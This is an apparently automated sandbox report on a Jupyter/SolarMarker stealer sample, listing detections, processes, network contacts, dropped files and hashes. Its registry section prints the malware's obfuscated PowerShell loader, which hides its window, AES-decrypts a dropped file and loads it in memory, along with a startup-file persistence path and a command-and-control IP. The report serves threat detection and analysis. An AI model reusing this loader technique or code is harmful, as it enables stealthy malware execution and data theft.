Malware Analysis Report

2024-10-24 18:08

Sample ID 220613-aa4h5agfc9
Target ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z
SHA256 e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9
Tags
jupyter backdoor stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9

Threat Level: Known bad

The file ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer suricata trojan

Jupyter, SolarMarker

suricata: ET MALWARE Jupyter Stealer CnC Checkin

Jupyter family

Blocklisted process makes network request

Drops startup file

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-06-13 00:02

Signatures

Jupyter family

jupyter

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-13 00:01

Reported

2022-06-13 00:08

Platform

win10-20220414-en

Max time kernel

138s

Max time network

298s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

suricata: ET MALWARE Jupyter Stealer CnC Checkin

suricata

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe

"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2932 -s 944

Network

Country | Destination | Domain | Proto
RO | 37.120.247.120:80 | 37.120.247.120 | tcp
US | 8.238.20.126:80 | | tcp

Files

memory/2932-114-0x0000000000720000-0x0000000001720000-memory.dmp

memory/4040-115-0x0000000000000000-mapping.dmp

memory/4040-121-0x000002122E240000-0x000002122E262000-memory.dmp

memory/4040-142-0x000002122E3E0000-0x000002122E41C000-memory.dmp

memory/4040-153-0x000002122E8F0000-0x000002122E966000-memory.dmp

memory/4340-230-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline

MD5 1eeb07bec0c50ea3fde3eb7ebbf2696c
SHA1 9ab2dc69969b2b3567978960338ed5fb4bbdba06
SHA256 377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4
SHA512 f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.0.cs

MD5 2f9b4948ac0b26204994e246094a9f5d
SHA1 9870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256 def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512 ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

memory/3708-233-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP

MD5 1c11d3ae5fd77a79312b6c30d0a66553
SHA1 96bf5d3745727569a87594103400b107da643152
SHA256 9956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9
SHA512 bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239

C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp

MD5 7323216a4b3cb72a8e4b9e18769a63d7
SHA1 e35e0b917b06e1bc586d031a5e27cdec42db5c17
SHA256 1fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900
SHA512 54ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab

C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.dll

MD5 e2fc3e1ad6b1857e10377afba34315a2
SHA1 b8b239cb809359e0d9893fe993cbf5fe3076cd91
SHA256 f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd
SHA512 7adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3

memory/4040-237-0x000002122E3B0000-0x000002122E3B8000-memory.dmp

memory/4368-329-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 2143b379fed61ab5450bab1a751798ce
SHA1 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256 a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

memory/4040-383-0x000002122E970000-0x000002122EA34000-memory.dmp